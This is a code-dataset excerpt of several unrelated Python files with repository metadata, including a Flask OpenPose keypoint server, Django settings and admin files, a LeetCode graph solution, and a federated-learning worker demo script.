@app.route('/openpose', methods=['POST'])
def responce():
print( "リクエスト受け取り" )
if( app.debug ):
print( "flask.request.method : ", flask.request.method )
print( "flask.request.headers \n: ", flask.request.headers )
#------------------------------------------
    # Get the JSON data sent with the request
#------------------------------------------
if( flask.request.headers["User-Agent"].split("/")[0] in "python-requests" ):
json_data = json.loads(flask.request.json)
else:
json_data = flask.request.get_json()
#------------------------------------------
    # Convert the image data sent with the request
#------------------------------------------
pose_img_cv = conv_base64_to_cv( json_data["pose_img_base64"] )
if( app.debug ):
cv2.imwrite( "tmp/pose_img.png", pose_img_cv )
#------------------------------------------
    # Run the OpenPose Python API
    # Reference : openpose_gpu/build/examples/tutorial_api_python/01_body_from_image.py
#------------------------------------------
    # Set parameters
params = dict()
params["model_folder"] = OPENPOSE_MODE_DIR_PATH
params["face"] = True
params["hand"] = True
# OpenPose Python-API
opWrapper = op.WrapperPython()
opWrapper.configure(params)
opWrapper.start()
# Process Image
datum = op.Datum()
datum.cvInputData = pose_img_cv
opWrapper.emplaceAndPop([datum])
    # Get keypoints
pose_keypoints_2d = np.delete( datum.poseKeypoints, [8, 19, 20, 21, 22, 23, 24], axis=1).reshape(-1).tolist()
face_keypoints_2d = datum.faceKeypoints.reshape(-1).tolist()
pose_keypoints_3d = datum.poseKeypoints3D.tolist()
face_keypoints_3d = datum.faceKeypoints3D.tolist()
left_hand_keypoints_2d = datum.handKeypoints[0].reshape(-1).tolist()
right_hand_keypoints_2d = datum.handKeypoints[1].reshape(-1).tolist()
hand_left_keypoints_3d = datum.handKeypoints3D[0].tolist()
hand_right_keypoints_3d = datum.handKeypoints3D[1].tolist()
"""
if( args.debug ):
print("pose_keypoints_2d : ", pose_keypoints_2d )
#print("pose_keypoints_2d[0][0] : ", pose_keypoints_2d[0][0] )
#print("face_keypoints_2d: ", face_keypoints_2d )
#print("pose_keypoints_3d: ", pose_keypoints_3d )
#print("datum.cvOutputData: ", datum.cvOutputData )
"""
#------------------------------------------
    # Build the response message
#------------------------------------------
http_status_code = 200
response = flask.jsonify(
{
"version" : 1.3,
"people" : [
{
"pose_keypoints_2d" : pose_keypoints_2d,
"face_keypoints_2d" : face_keypoints_2d,
"hand_left_keypoints_2d" : left_hand_keypoints_2d,
"hand_right_keypoints_2d" : right_hand_keypoints_2d,
"pose_keypoints_3d" : pose_keypoints_3d,
"face_keypoints_3d" : face_keypoints_3d,
"hand_left_keypoints_3d" : hand_left_keypoints_3d,
"hand_right_keypoints_3d" : hand_right_keypoints_3d,
}
]
}
)
    # Add headers to the response (a workaround for Access-Control-Allow-Origin errors)
#response.headers.add('Access-Control-Allow-Origin', '*')
#response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
#response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')
if( app.debug ):
print( "response.headers : \n", response.headers )
return response, http_status_code
if __name__ == "__main__":
parser = argparse.ArgumentParser()
    #parser.add_argument('--host', type=str, default="localhost", help="host name (container name or container ID)")
    #parser.add_argument('--host', type=str, default="openpose_ubuntu_gpu_container", help="host name (container name or container ID)")
    parser.add_argument('--host', type=str, default="0.0.0.0", help="host name (container name or container ID)")
    parser.add_argument('--port', type=str, default="5010", help="port number")
    parser.add_argument('--enable_threaded', action='store_true', help="enable threaded request handling")
    parser.add_argument('--debug', action='store_true', help="enable debug mode")
args = parser.parse_args()
if( args.debug ):
for key, value in vars(args).items():
print('%s: %s' % (str(key), str(value)))
if not os.path.exists("tmp"):
os.mkdir("tmp")
if( args.debug ):
app.debug = True
else:
app.debug = False
    if( args.enable_threaded ):
        app.run( host=args.host, port=args.port, threaded=True )
    else:
        app.run( host=args.host, port=args.port, threaded=False )
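# A hypothetical client for the /openpose endpoint above (host, port, and image
# path are illustrative; the body is sent as a JSON string because the handler
# calls json.loads() on the payload for python-requests clients):
#   import base64, json, requests
#   with open('pose.png', 'rb') as f:
#       img_base64 = base64.b64encode(f.read()).decode('utf-8')
#   payload = json.dumps({'pose_img_base64': img_base64})
#   res = requests.post('http://localhost:5010/openpose', json=payload)
#   print(res.json()['people'][0]['pose_keypoints_2d'][:6])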
|
[
"y034112@gmail.com"
] |
y034112@gmail.com
|
920d2263cbeb1e5be4d7cfac31f5ccec2fafdc5a
|
1f0831db24ae2772d4944faf05289599bb37aca7
|
/data_crawling/08/api/setup.py
|
4d6fe9c915145a8327f8ea7ba8e946c9660fc6d8
|
[] |
no_license
|
smaystr/rails_reactor
|
2123f39ae97f38acb647363979fe4a09b896670e
|
69c8aac5860527768b4a8b7bce027b9dea6b1989
|
refs/heads/master
| 2022-08-19T05:35:21.535933
| 2019-08-28T12:46:22
| 2019-08-28T12:46:22
| 189,264,026
| 1
| 0
| null | 2022-07-29T22:34:56
| 2019-05-29T16:47:08
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
from setuptools import setup
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setup(
name="sergey_milantiev_crawler_master",
version="0.0.0",
install_requires=requirements,
packages=["app"],
author="sergey.milantiev@gmail.com",
url="",
download_url="",
description="CRAWLER DOMRIA API",
long_description="",
license="MIT",
keywords="",
classifiers=[
"Intended Audience :: Developers",
"Programming Language :: Python",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.7",
],
)
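# Assuming requirements.txt sits next to this setup.py, the package and its
# pinned dependencies install via:
#   pip install .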
|
[
"smaystr@gmail.com"
] |
smaystr@gmail.com
|
881b2796e754eccb435d9f1824561012eb3f9263
|
8308fa0e5f998e0aa6741af5720d6da99497060d
|
/estoque/admin.py
|
deb9bd5b8513f6c1109d2812a086ec45998d55fe
|
[] |
no_license
|
gbpjr/sistema-estoque
|
7aae11c657c555b98a329cdafde704504ef8b23a
|
701471e593fa758a1da1b66fa279da4dd3d979e7
|
refs/heads/master
| 2020-04-23T08:37:35.123431
| 2019-02-24T21:43:14
| 2019-02-24T21:43:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 207
|
py
|
from django.contrib import admin
from .models import Local, Tipo, Fabricante, Componente
admin.site.register(Local)
admin.site.register(Tipo)
admin.site.register(Fabricante)
admin.site.register(Componente)
|
[
"="
] |
=
|
eadbd701bc7fafb29b726f2330b241a74aad34d8
|
9cdfe7992090fb91696eec8d0a8ae15ee12efffe
|
/recursion/prob1221.py
|
75de61d8cb82f1561f811ecae781765b333d2848
|
[] |
no_license
|
binchen15/leet-python
|
e62aab19f0c48fd2f20858a6a0d0508706ae21cc
|
e00cf94c5b86c8cca27e3bee69ad21e727b7679b
|
refs/heads/master
| 2022-09-01T06:56:38.471879
| 2022-08-28T05:15:42
| 2022-08-28T05:15:42
| 243,564,799
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
# 1221 Split string into Balanced Strings
class Solution(object):
def balancedStringSplit(self, s):
"""
:type s: str
:rtype: int
"""
m = len(s)
if m == 2:
return 1
i = 2
while i < m:
if self.isBalanced(s[:i]):
# self.balancedStringSplit(s[:i])
return 1 + self.balancedStringSplit(s[i:])
i += 2
return 1
def isBalanced(self, sub):
return sub.count("L") == sub.count('R')
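# A quick check of the splitter (the input is the LeetCode sample; the expected
# count of balanced substrings is 4):
if __name__ == '__main__':
    print(Solution().balancedStringSplit('RLRRLLRLRL'))  # 4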
|
[
"binchen.devops@gmail.com"
] |
binchen.devops@gmail.com
|
31b90af5e2d762ee6482a7c0202484d4b2a0cff5
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/spaCy/2016/4/test_only_punct.py
|
12c9580880eb988530171fcf1973e0dc5ca361fa
|
[
"MIT"
] |
permissive
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005
| 2021-01-28T19:40:51
| 2021-01-28T19:40:51
| 306,497,459
| 1
| 1
| null | 2020-11-24T20:56:18
| 2020-10-23T01:18:07
| null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
from __future__ import unicode_literals
def test_only_pre1(en_tokenizer):
assert len(en_tokenizer("(")) == 1
def test_only_pre2(en_tokenizer):
assert len(en_tokenizer("((")) == 2
|
[
"rodrigosoaresilva@gmail.com"
] |
rodrigosoaresilva@gmail.com
|
47c3be1644c3b304105e0c662dc9f38ee860d001
|
9ecb6a1d3a71e7f87f3784af6b808f23a2abe348
|
/drlhp/show_prefs.py
|
4227c4f161eda839c7a5c5661322f9b2b12658a5
|
[] |
no_license
|
HumanCompatibleAI/interactive-behaviour-design
|
13ae305b39d29595e8fd5907f8d9e9fa6c2efc16
|
226db7a55d64ce15edfb8d7b3352c7bf7b81b533
|
refs/heads/master
| 2020-05-02T16:54:02.232639
| 2019-08-08T14:29:11
| 2019-08-08T14:29:11
| 178,082,205
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,945
|
py
|
#!/usr/bin/env python3
"""
Display examples of the specified preference database
(with the more-preferred segment on the left,
and the less-preferred segment on the right;
equally-preferred pairs are shown in their stored order)
"""
import argparse
import pickle
from multiprocessing import freeze_support
import numpy as np
from utils import VideoRenderer
def main():
parser = argparse.ArgumentParser()
parser.add_argument("prefs", help=".pkl.gz file")
args = parser.parse_args()
with open(args.prefs, 'rb') as pkl_file:
print("Loading preferences from '{}'...".format(args.prefs), end="")
prefs = pickle.load(pkl_file)
print("done!")
print("{} preferences found".format(len(prefs)))
print("(Preferred clip on the left)")
v = VideoRenderer(zoom=2, mode=VideoRenderer.restart_on_get_mode)
q = v.vid_queue
prefs = prefs[0] # The actual pickle file is a tuple of test, train DBs
for k1, k2, pref in prefs.prefs:
pref = tuple(pref)
if pref == (0.0, 1.0) or pref == (0.5, 0.5):
s1 = np.array(prefs.segments[k2])
s2 = np.array(prefs.segments[k1])
elif pref == (1.0, 0.0):
s1 = np.array(prefs.segments[k1])
s2 = np.array(prefs.segments[k2])
else:
raise Exception("Unexpected preference", pref)
print("Preference", pref)
vid = []
height = s1[0].shape[0]
border = np.ones((height, 10), dtype=np.uint8) * 128
for t in range(len(s1)):
# -1 => select the last frame in the 4-frame stack
f1 = s1[t, :, :, -1]
f2 = s2[t, :, :, -1]
frame = np.hstack((f1, border, f2))
vid.append(frame)
n_pause_frames = 10
for _ in range(n_pause_frames):
vid.append(np.copy(vid[-1]))
q.put(vid)
input()
v.stop()
if __name__ == '__main__':
freeze_support()
main()
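# A hypothetical invocation (the filename is illustrative, matching the --help
# text above):
#   python3 show_prefs.py train_prefs.pkl.gz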
|
[
"matthew.rahtz@gmail.com"
] |
matthew.rahtz@gmail.com
|
b5644533f4814bf76a438d3f873511d94ae32cb7
|
ffedbe2d957677d65cb873d96482f1c94e74b988
|
/regs/depth/paragraph.py
|
4c7ad12fb53030d7ebe97823604eec9398cee496
|
[] |
no_license
|
cmc333333/Depth-Parser
|
b7602c158b6cb75179af90b78af93f28e547a3d2
|
4332b8c51e8e7d44b68985b3845b300d251af536
|
refs/heads/master
| 2020-05-20T12:09:03.662019
| 2013-04-16T20:37:56
| 2013-04-16T20:37:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,421
|
py
|
import itertools
import re
from regs.depth import tree
from regs.search import segments
from regs.utils import roman_nums
import string
p_levels = [
list(string.ascii_lowercase),
[str(i) for i in range(1,51)],
list(itertools.islice(roman_nums(), 0, 50)),
list(string.ascii_uppercase),
# Technically, there's italics (alpha) and (roman), but we aren't
# handling that yet
]
class ParagraphParser():
def __init__(self, p_regex, inner_label_fn):
"""p_regex is the regular expression used when searching through
paragraphs. It should contain a %s for the next paragraph 'part'
(e.g. 'a', 'A', '1', 'i', etc.) inner_label_fn is a function which
takes the current label, and the next paragraph 'part' and produces
a new label."""
self.p_regex = p_regex
self.inner_label_fn = inner_label_fn
def matching_subparagraph_ids(self, p_level, paragraph):
"""Return a list of matches if this paragraph id matches one of the
subparagraph ids (e.g. letter (i) and roman numeral (i)."""
matches = []
for depth in range(p_level+1, len(p_levels)):
for sub_id, sub in enumerate(p_levels[depth]):
if sub == p_levels[p_level][paragraph]:
matches.append((depth, sub_id))
return matches
def best_start(self, text, p_level, paragraph, starts, exclude = []):
"""Given a list of potential paragraph starts, pick the best based
on knowledge of subparagraph structure. Do this by checking if the
id following the subparagraph (e.g. ii) is between the first match
and the second. If so, skip it, as that implies the first match was
a subparagraph."""
subparagraph_hazards = self.matching_subparagraph_ids(p_level,
paragraph)
starts = starts + [(len(text), len(text))]
for i in range(1, len(starts)):
_, prev_end = starts[i-1]
next_start, _ = starts[i]
s_text = text[prev_end:next_start]
s_exclude = [(e_start + prev_end, e_end + prev_end)
for e_start, e_end in exclude]
is_subparagraph = False
for hazard_level, hazard_idx in subparagraph_hazards:
if self.find_paragraph_start_match(s_text, hazard_level,
hazard_idx + 1, s_exclude):
is_subparagraph = True
if not is_subparagraph:
return starts[i-1]
def find_paragraph_start_match(self, text, p_level, paragraph, exclude=[]):
"""Find the positions for the start and end of the requested label.
        p_level is one of 0,1,2,3; paragraph is the index within that label.
Return None if not present. Does not return results in the exclude
list (a list of start/stop indices). """
if len(p_levels) <= p_level or len(p_levels[p_level]) <= paragraph:
return None
match_starts = [(m.start(), m.end()) for m in re.finditer(
self.p_regex % p_levels[p_level][paragraph], text)]
match_starts = [(start, end) for start,end in match_starts
if all([end < es or start > ee for es, ee in exclude])]
if len(match_starts) == 0:
return None
elif len(match_starts) == 1:
return match_starts[0]
else:
return self.best_start(text, p_level, paragraph, match_starts,
exclude)
def paragraph_offsets(self, text, p_level, paragraph, exclude = []):
"""Find the start/end of the requested paragraph. Assumes the text
does not just up a p_level -- see build_paragraph_tree below."""
start = self.find_paragraph_start_match(text, p_level, paragraph,
exclude)
        if start is None:
return None
id_start, id_end = start
end = self.find_paragraph_start_match(text[id_end:], p_level,
paragraph + 1, [(e_start - id_end, e_end - id_end)
for e_start, e_end in exclude])
        if end is None:
end = len(text)
else:
end = end[0] + id_end
return (id_start, end)
def paragraphs(self, text, p_level, exclude = []):
"""Return a list of paragraph offsets defined by the level param."""
def offsets_fn(remaining_text, p_idx, exclude):
return self.paragraph_offsets(remaining_text, p_level, p_idx,
exclude)
return segments(text, offsets_fn, exclude)
def build_paragraph_tree(self, text, p_level = 0, exclude = [],
label = tree.label("", [])):
"""
Build a dict to represent the text hierarchy.
"""
subparagraphs = self.paragraphs(text, p_level, exclude)
if subparagraphs:
body_text = text[0:subparagraphs[0][0]]
else:
body_text = text
children = []
for paragraph, (start,end) in enumerate(subparagraphs):
new_text = text[start:end]
new_excludes = [(e[0] - start, e[1] - start) for e in exclude]
new_label = self.inner_label_fn(label,
p_levels[p_level][paragraph])
children.append(self.build_paragraph_tree(new_text, p_level + 1,
new_excludes, new_label))
return tree.node(body_text, children, label)
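# A standalone illustration of the ambiguity that matching_subparagraph_ids and
# best_start guard against, assuming roman_nums() yields lowercase numerals (as
# the equality test in matching_subparagraph_ids implies): the ninth lowercase
# letter and the first roman numeral are both 'i', so a bare regex match cannot
# tell paragraph (i) at one depth from subparagraph (i) at a deeper one:
#   >>> p_levels[0][8], p_levels[2][0]
#   ('i', 'i')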
|
[
"cm.lubinski@gmail.com"
] |
cm.lubinski@gmail.com
|
4af2ccbccc3801bfd03ba5d348228bde9e7d5e13
|
fd133e8252dc4ddb8221007f806da336639e9029
|
/924_minimize_malware_speed.py
|
9ebceeb1693f0f22ca3036256554fcb1d0d201ee
|
[] |
no_license
|
nikrasiya/Graph-2
|
ea331e8470a73eef2f70cbb71f28023f704f1ba2
|
4689f2e0d1a0847ab519715d7659939dad89e001
|
refs/heads/master
| 2021-05-17T16:21:17.539763
| 2020-04-06T13:18:31
| 2020-04-06T13:18:31
| 250,869,007
| 0
| 0
| null | 2020-03-28T18:44:58
| 2020-03-28T18:44:58
| null |
UTF-8
|
Python
| false
| false
| 4,082
|
py
|
from typing import List
from collections import defaultdict, Counter
class Solution:
def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
"""
https://leetcode.com/problems/minimize-malware-spread/
Time Complexity - O(V*E)
'V' -> vertices
'E' -> edges
Space Complexity - O(V)
"""
self.n = len(graph)
self.colors = [-1] * self.n
c = 0
for i in range(self.n):
self._dfs(i, c, graph)
c += 1
groups = Counter(self.colors)
init_color = [0] * c
for node in initial:
init_color[self.colors[node]] += 1
result = float('inf')
for node in initial:
color = self.colors[node]
count = init_color[color]
if count == 1:
if result == float('inf'):
result = node
elif groups[color] > groups[self.colors[result]]:
result = node
elif groups[color] == groups[self.colors[result]] and node < result:
result = node
if result == float('inf'):
return min(initial)
return result
def _dfs(self, node, color, graph):
# base
if self.colors[node] != -1:
return
# logic
self.colors[node] = color
for i in range(self.n):
if graph[node][i] == 1:
self._dfs(i, color, graph)
# def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
# """
# https://leetcode.com/problems/minimize-malware-spread/
# Time Complexity -
# Space Complexity -
# """
# adj_matrix = defaultdict(list)
# initial = sorted(initial)
# # graph
# for node in range(len(graph)):
# for edge in range(len(graph[0])):
# if graph[node][edge] == 1:
# adj_matrix[node].append(edge)
# # make groups
# groups = {}
# counts = {}
# g_name = 0
# min_group_name = None
# max_group_size = float('-inf')
# visited = set()
# for node in initial:
# group, infected_count = self._dfs(initial, visited, adj_matrix, node)
# if group:
# groups[g_name] = group
# counts[g_name] = infected_count
# if infected_count == 1 and len(group) > max_group_size:
# max_group_size = len(group)
# min_group_name = g_name
# g_name += 1
# if min_group_name is None:
# return min(initial)
# return min(set(initial).intersection(groups[min_group_name]))
#
# def _dfs(self, initial, visited, adj_matrix, root):
# if root in visited:
# return None, None
# stack = [root]
# result = []
# initial_count = 0
# while stack:
# cur = stack.pop()
# if cur in initial:
# initial_count += 1
# for edge in adj_matrix[cur]:
# if edge != cur and edge not in visited:
# stack.append(edge)
# if cur not in visited:
# visited.add(cur)
# result.append(cur)
# return result, initial_count
if __name__ == '__main__':
print(Solution().minMalwareSpread([[1, 1, 1], [1, 1, 1], [1, 1, 1]], [1, 2]))
print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1]))
print(Solution().minMalwareSpread([[1, 0, 0], [0, 1, 0], [0, 0, 1]], [0, 2]))
print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1, 2]))
print(Solution().minMalwareSpread([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 1], [0, 0, 1, 1]], [3, 1]))
print(Solution().minMalwareSpread(
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0], [0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 1]], [5, 0]))
|
[
"you@example.com"
] |
you@example.com
|
77ebbe0d48ff860ba8eab641e85ade6503ca77d9
|
f2ab8ccda7203dd37d61facb9978cf74b781c7f1
|
/tests/models.py
|
2a33a19a5a6c499db6c4c5ca9168a18891a56d61
|
[
"MIT"
] |
permissive
|
Apkawa/easy-thumbnails-admin
|
1991137224dcd117520b2c114d4012daf803776e
|
9d7a38f215cdac53a663b00f1d4ff3a3c2a54eb4
|
refs/heads/master
| 2021-01-01T15:47:34.334792
| 2017-11-23T10:38:09
| 2017-11-23T10:38:09
| 97,703,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
from django.db import models
from easy_thumbnails.fields import ThumbnailerImageField
def upload_to(instance, filename):
return 'example/{}'.format(filename)
class Example(models.Model):
image = ThumbnailerImageField(upload_to=upload_to)
|
[
"apkawa@gmail.com"
] |
apkawa@gmail.com
|
139ecc75596912c669b4ed0216a1514922c50a4c
|
605611de5eae63ce4eef388a287a3ef18b52eae7
|
/CovidCrowd/settings.py
|
95d5f1e4b28e5afba1ede23609cd8a48a22b35cd
|
[] |
no_license
|
RahulAttarde/CovidCrowd
|
e6b2e45c222f03112c157403c2d6630d888599d8
|
55740e1ea72cd434aed0a627f6fffb16024a6f17
|
refs/heads/master
| 2021-04-23T00:02:46.726288
| 2020-03-25T02:45:35
| 2020-03-25T02:45:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,879
|
py
|
"""
Django settings for CovidCrowd project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config("DEBUG", default=False, cast=bool)  # cast, so the string "False" is not treated as truthy
ALLOWED_HOSTS = config("MY_HOSTS", cast=Csv())
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.gis",
"social_django",
"crispy_forms",
"patients",
"rest_framework",
"django_filters",
"django_tables2",
"debug_toolbar",
"memcache_status",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"social_django.middleware.SocialAuthExceptionMiddleware",
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = "CovidCrowd.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"social_django.context_processors.backends",
"social_django.context_processors.login_redirect",
],
},
},
]
WSGI_APPLICATION = "CovidCrowd.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.contrib.gis.db.backends.spatialite",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
AUTHENTICATION_BACKENDS = (
"social_core.backends.github.GithubOAuth2",
"social_core.backends.twitter.TwitterOAuth",
"social_core.backends.google.GoogleOAuth2",
"django.contrib.auth.backends.ModelBackend",
)
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "Asia/Kolkata"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Crispy forms
CRISPY_TEMPLATE_PACK = "bootstrap4"
# OAUTH for Social Login
LOGIN_URL = "/login-form"
SOCIAL_AUTH_URL_NAMESPACE = "social"
SOCIAL_AUTH_LOGIN_REDIRECT_URL = "/"
SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY")
SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET")
SOCIAL_AUTH_TWITTER_KEY = config("SOCIAL_AUTH_TWITTER_KEY")
SOCIAL_AUTH_TWITTER_SECRET = config("SOCIAL_AUTH_TWITTER_SECRET")
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = config("SOCIAL_AUTH_GOOGLE_OAUTH2_KEY")
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = config("SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET")
# Django REST Framework
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
INTERNAL_IPS = [
'127.0.0.1',
]
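# A hypothetical .env file consumed by the config() calls above (every value is
# a placeholder):
#   SECRET_KEY=replace-me
#   DEBUG=True
#   MY_HOSTS=127.0.0.1,localhost
#   SOCIAL_AUTH_GITHUB_KEY=xxx
#   SOCIAL_AUTH_GITHUB_SECRET=xxx
#   SOCIAL_AUTH_TWITTER_KEY=xxx
#   SOCIAL_AUTH_TWITTER_SECRET=xxx
#   SOCIAL_AUTH_GOOGLE_OAUTH2_KEY=xxx
#   SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET=xxx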
|
[
"arun@arunmozhi.in"
] |
arun@arunmozhi.in
|
e1752708a0af5efe19acf9209a0dd0734303fa0d
|
840b98f14f181f7dbd693f2ee4b3c46e5be59305
|
/demos/demo_pycloudmessenger/POM2/NeuralNetworks/pom2_NN_worker_pycloudmessenger.py
|
672126432edb472a87502a57beff578247d9307a
|
[
"Apache-2.0"
] |
permissive
|
Musketeer-H2020/MMLL-Robust
|
4ef6b2ff5dff18d4d2b2a403a89d9455ba861e2b
|
ccc0a7674a04ae0d00bedc38893b33184c5f68c6
|
refs/heads/main
| 2023-09-01T18:47:46.065297
| 2021-09-28T15:34:12
| 2021-09-28T15:34:12
| 386,264,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,614
|
py
|
# -*- coding: utf-8 -*-
'''
@author: Marcos Fernandez Diaz
November 2020
Example of use: python pom2_NN_worker_pycloudmessenger.py --user <user> --password <password> --task_name <task_name> --id <id>
Parameters:
- user: String with the name of the user. If the user does not exist in the pycloudmessenger platform a new one will be created
- password: String with the password
- task_name: String with the name of the task. If the task already exists, an error will be displayed
- id: Integer representing the partition of data to be used by the worker. Each worker should use a different partition, possible values are 0 to 4.
'''
# Import general modules
import argparse
import logging
import json
import numpy as np
import sys, os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Disables tensorflow warnings
import tensorflow as tf
import onnxruntime
# Add higher directory to python modules path.
sys.path.append("../../../../")
# To be imported from MMLL (pip installed)
from MMLL.nodes.WorkerNode import WorkerNode
from MMLL.comms.comms_pycloudmessenger import Comms_worker as Comms
# To be imported from demo_tools
from demo_tools.task_manager_pycloudmessenger import Task_Manager
from demo_tools.data_connectors.Load_from_file import Load_From_File as DC
from demo_tools.mylogging.logger_v1 import Logger
from demo_tools.evaluation_tools import display, plot_cm_seaborn, create_folders
# Set up logger
logging.basicConfig(
level=logging.ERROR,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--user', type=str, default=None, help='User')
parser.add_argument('--password', type=str, default=None, help='Password')
parser.add_argument('--task_name', type=str, default=None, help='Name of the task')
parser.add_argument('--id', type=int, default=None, choices=[0, 1, 2, 3, 4], help='The data partition of the worker')
FLAGS, unparsed = parser.parse_known_args()
user_name = FLAGS.user
user_password = FLAGS.password
task_name = FLAGS.task_name
data_partition_id = FLAGS.id # This integer identifies the data partition used for the worker
# Set basic configuration
dataset_name = 'mnist'
verbose = False
pom = 2
model_type = 'NN'
# Create the directories for storing relevant outputs if they do not exist
create_folders("./results/")
# Setting up the logger
logger = Logger('./results/logs/Worker_' + str(user_name) + '.log')
# Load credentials file to use pycloudmessenger
    # Note: this part creates the user and joins the task. This code is intended to be used only at the demos, in Musketeer this part must be done in the client.
display('===========================================', logger, verbose)
credentials_filename = '../../musketeer.json'
try:
with open(credentials_filename, 'r') as f:
credentials = json.load(f)
except:
display('Error - The file musketeer.json is not available, please put it under the following path: "' + os.path.abspath(os.path.join("","../../")) + '"', logger, verbose)
sys.exit()
# Create user and join the task
tm = Task_Manager(credentials_filename)
participant = tm.create_worker_and_join_task(user_name, user_password, task_name, display, logger)
# Creating the comms object
display('Creating WorkerNode under POM %d, communicating through pycloudmessenger' %pom, logger, verbose)
comms = Comms(participant, user_name)
# Creating Workernode
wn = WorkerNode(pom, comms, logger, verbose)
display('-------------------- Loading dataset %s --------------------------' % dataset_name, logger, verbose)
# Load data
# Warning: this data connector is only designed for the demos. In Musketeer, appropriate data
# connectors must be provided
data_file = '../../../../input_data/' + dataset_name + '_demonstrator_data.pkl'
try:
dc = DC(data_file)
except:
display('Error - The file ' + dataset_name + '_demonstrator_data.pkl does not exist. Please download it from Box and put it under the following path: "' + os.path.abspath(os.path.join("","../../../../input_data/")) + '"', logger, verbose)
sys.exit()
# Get train/test data and set training data
[Xtr, ytr, _, _, Xtst, ytst] = dc.get_all_data_Worker(int(data_partition_id))
wn.set_training_data(dataset_name, Xtr, ytr)
display('WorkerNode loaded %d patterns for training' % wn.NPtr, logger, verbose)
# Creating a ML model and start training procedure
wn.create_model_worker(model_type)
display('MMLL model %s is ready for training!' %model_type, logger, verbose)
